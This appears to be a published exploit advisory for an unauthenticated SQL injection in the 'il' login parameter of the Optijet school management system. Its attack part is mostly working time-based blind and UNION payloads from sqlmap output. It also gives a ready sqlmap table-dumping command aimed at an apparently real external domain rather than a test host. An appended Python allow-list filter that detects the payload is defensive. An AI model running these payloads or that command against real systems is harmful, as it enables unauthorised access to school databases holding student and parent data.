# Exploit Title: Optijet School Management System 1.0 - SQL Injection (Unauthenticated)
# Date: 19.10.2021
# Exploit Author: MaliciousFolder
# Vendor Homepage: http://optijet.net/optijet/index.php?r=kalan
# Version: 1.0
# Tested on: Windows 10 - Ubuntu 20.04.3 LTS
# Vulnerable Parameter: "il"

Optijet, a school management system used in Turkey, has an SQL injection vulnerability in its login forms.

PoC:
The "il" POST parameter on http://localhost/index.php is injectable. The request body is:
il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F
The sqlmap result for this request:

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: il (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: il=0 UNION ALL SELECT CONCAT(0x717a627171,0x46774f754d596e6e666d4a71646468726f4a785250754e4d557441416862555344647a6542765a69,0x7176627871),NULL,NULL,NULL-- -&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F
---



SQLMAP Command to retrieve tables from DB: sqlmap.py -u okulpedia.okulsonuc.com --forms --tables
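
Added example, not part of the original advisory and not vendor code: a strict allow-list check for the numeric login-form fields, usable as a request filter in front of an unpatched install or for reviewing logged POST bodies. It assumes il, ilce, okul, sinav and sinif are integer IDs (all are 0 in the request above); the function name and the REPEATED sample are constructed for illustration, and the application itself still needs parameterized queries.

```python
import re
from urllib.parse import parse_qsl

# Assumption: these login-form fields carry integer IDs only.
NUMERIC_FIELDS = ("il", "ilce", "okul", "sinav", "sinif")
INTEGER = re.compile(r"[0-9]{1,10}")


def violations(body):
    """Return the reasons a POST body fails the numeric allow-list ([] if clean)."""
    values = {}
    # parse_qsl percent-decodes, so encoded and raw payloads are judged alike.
    for key, value in parse_qsl(body, keep_blank_values=True):
        values.setdefault(key, []).append(value)

    problems = []
    for field in NUMERIC_FIELDS:
        seen = values.get(field, [])
        if len(seen) != 1:
            # Missing or repeated field: which copy the backend uses is parser-dependent.
            problems.append(f"{field}: expected exactly one value, got {len(seen)}")
        elif not INTEGER.fullmatch(seen[0]):
            problems.append(f"{field}: non-integer value {seen[0]!r}")
    return problems


# Request body from the advisory (normal login attempt).
BENIGN = ("il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd="
          "&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F")
# Time-based payload exactly as reported by sqlmap in the advisory.
TIME_BASED = ("il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)"
              "&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd="
              "&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F")
# Constructed sample: the same field sent twice.
REPEATED = "il=0&il=7&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("time-based", TIME_BASED),
                       ("repeated", REPEATED)):
        print(name, "->", violations(body) or "ok")
```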